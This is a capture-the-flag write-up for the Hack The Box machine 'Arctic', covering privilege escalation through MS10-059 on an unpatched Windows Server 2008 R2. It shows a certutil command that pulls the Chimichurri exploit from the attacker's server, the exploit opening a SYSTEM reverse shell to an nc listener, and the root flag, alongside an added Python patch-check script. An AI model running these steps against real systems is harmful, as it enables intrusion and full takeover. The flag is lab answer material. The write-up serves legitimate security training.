HTB – Arctic {retired}

We check the operating system version and the installed patches, looking for a privilege-escalation vulnerability. systeminfo reports Microsoft Windows Server 2008 R2 Standard, version 6.1.7600 N/A Build 7600, i.e. the RTM build without Service Pack 1, and Hotfix(s): N/A, so no security update has ever been applied to the box.
An unpatched 2008 R2 RTM is affected by MS10-059 (elevation of privilege in the Tracing feature for services); a public exploit for it, Chimichurri, is available at https://www.exploit-db.com/exploits/14610/

C:\>systeminfo
systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00477-001-0000421-84900
Original Install Date:     22/3/2017, 11:09:45   
System Boot Time:          29/12/2017, 3:34:21   
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
                           [02]: Intel64 Family 6 Model 63 Stepping 2 GenuineIntel ~2600 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 5/4/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.024 MB
Available Physical Memory: 88 MB
Virtual Memory: Max Size:  2.048 MB
Virtual Memory: Available: 1.085 MB
Virtual Memory: In Use:    963 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11
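As an added check that is not part of the original write-up: a small Python script that parses systeminfo output and flags the precondition the exploit relies on, an unpatched 6.1.7600 RTM build with the MS10-059 update absent. The first sample is copied from the transcript above; the two "patched" samples, the bulletin-to-KB mapping (KB982799) and the set of builds considered are this example's assumptions, to be verified against the bulletin. It is a one-bulletin, hand-rolled version of what Windows-Exploit-Suggester does against the full bulletin database.

```python
import re

# Lines copied from the systeminfo transcript of this box (trimmed to the
# fields the check needs).
ARCTIC_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Configuration:          Standalone Server
System Type:               x64-based PC
Hotfix(s):                 N/A
"""

# Constructed negative sample (not from the box): same product at SP1 with
# hotfixes listed the way systeminfo prints them.
PATCHED_SYSTEMINFO = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Configuration:          Standalone Server
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB976932
                           [02]: KB982799
                           [03]: KB4012212
"""

# Constructed sample (not from the box): RTM build with only the MS10-059 fix.
RTM_PATCHED_SYSTEMINFO = """\
Host Name:                 RTMFIXED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB982799
"""

# Assumptions of this example: MS10-059 ships as KB982799, and build 7601 (SP1)
# already contains it, so only the RTM build 7600 is in scope here.
MS10_059_KB = "KB982799"
VULNERABLE_BUILDS = {7600}          # Windows 7 / Server 2008 R2 RTM

FIELD_RE = re.compile(r"^(\S[^:]*?):\s*(.*)$")
KB_RE = re.compile(r"KB\d{6,7}")


def parse_systeminfo(text):
    """Map each 'Key:  value' line to its value; indented continuation lines
    (hotfix entries, NIC details) are collected under '<Key>_items'."""
    info, key = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            if key is not None:
                info.setdefault(key + "_items", []).append(line.strip())
            continue
        m = FIELD_RE.match(line)
        if m:
            key = m.group(1).strip()
            info[key] = m.group(2).strip()
    return info


def build_number(info):
    """Build number from the 'OS Version' field, or None if absent."""
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None


def installed_kbs(info):
    """Sorted KB identifiers from the Hotfix(s) block; 'N/A' yields []."""
    return sorted(set(KB_RE.findall(" ".join(info.get("Hotfix(s)_items", [])))))


def check_ms10_059(info):
    """Return (vulnerable, reason) for the MS10-059 / Chimichurri case."""
    build = build_number(info)
    if build is None:
        return False, "OS Version line missing or unparsable"
    if build not in VULNERABLE_BUILDS:
        return False, f"build {build} is outside the RTM builds this check covers"
    kbs = installed_kbs(info)
    if MS10_059_KB in kbs:
        return False, f"{MS10_059_KB} is installed"
    return True, f"build {build} with {len(kbs)} hotfix(es) and {MS10_059_KB} missing"


if __name__ == "__main__":
    for name, text in (("arctic", ARCTIC_SYSTEMINFO),
                       ("patched", PATCHED_SYSTEMINFO),
                       ("rtm+fix", RTM_PATCHED_SYSTEMINFO)):
        info = parse_systeminfo(text)
        vuln, why = check_ms10_059(info)
        print(f"{name}: {info['OS Name']} build {build_number(info)} -> "
              f"{'VULNERABLE' if vuln else 'not vulnerable'} ({why})")
```

Feed it the raw output of `systeminfo` captured from the target; the verdict is only a prompt to look at the bulletin, since a KB can be superseded by a later cumulative update that this single-bulletin table does not know about.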

We download the compiled exploit locally, serve it over HTTP from the Kali machine and transfer it to the target with certutil.exe, using the syntax certutil.exe -urlcache -split -f <URL OF THE FILE TO DOWNLOAD> <NAME OF THE SAVED FILE>, after first changing to the directory C:\Users\tolis\Downloads. The address in the URL must be the attacker's current VPN (tun0) address: the transcript below shows 10.10.14.3 for the download and 10.10.14.4 for the reverse shell. Once the file is on the target, compare its size in dir (97.280 bytes here) or its certutil -hashfile output with the local copy before running it.

C:\Users\tolis\Downloads>certutil.exe -urlcache -split -f http://10.10.14.3/Chimichurri.exe Chimichurri.exe
certutil.exe -urlcache -split -f http://10.10.14.3/Chimichurri.exe Chimichurri.exe
http://10.10.14.3/Chimichurri.exe

WinHttp Cache entries: 1

****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\tolis\Downloads>

We run the exploit passing the Kali machine's IP and a port for the reverse shell. Launched with no arguments it only prints its usage; with ip and port it changes the registry values the tracing feature trusts, obtains a SYSTEM token, spawns the reverse shell and then restores the original registry values.

C:\Users\tolis\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\tolis\Downloads

14/06/2020  04:00     <DIR>          .
14/06/2020  04:00     <DIR>          ..
14/06/2020  04:10             97.280 Chimichurri.exe
               1 File(s)         97.280 bytes
               2 Dir(s)  33.184.137.216 bytes free

C:\Users\tolis\Downloads>Chimichurri.exe                   
Chimichurri.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
C:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.4 6667
Chimichurri.exe 10.10.14.4 6667
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
C:\Users\tolis\Downloads>

On Kali a listener on the port passed to the exploit must already be running when the exploit is launched: if nothing is listening the connection is refused and the exploit has to be re-run. The shell that comes back runs as SYSTEM (the exploit reports "Got SYSTEM token"); confirm it with whoami before going further.

kali@kali:~$ nc -vlp 6667
listening on [any] 6667 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.11] 49333
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\tolis\Downloads>

With the shell obtained, we navigate to the Administrator's Desktop and get the second flag.

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator

22/03/2017  09:10     <DIR>          .
22/03/2017  09:10     <DIR>          ..
22/03/2017  08:47     <DIR>          Contacts
22/03/2017  10:02     <DIR>          Desktop
22/03/2017  08:47     <DIR>          Documents
22/03/2017  08:47     <DIR>          Downloads
22/03/2017  08:47     <DIR>          Favorites
22/03/2017  08:47     <DIR>          Links
22/03/2017  08:47     <DIR>          Music
22/03/2017  08:47     <DIR>          Pictures
22/03/2017  08:47     <DIR>          Saved Games
22/03/2017  08:47     <DIR>          Searches
22/03/2017  08:47     <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  33.184.129.024 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users\Administrator\Desktop

22/03/2017  10:02     <DIR>          .
22/03/2017  10:02     <DIR>          ..
22/03/2017  10:02                 32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  33.184.129.024 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90
C:\Users\Administrator\Desktop>

From the Hack The Box console we can see that we have successfully submitted both the "user" key and the "root" key.
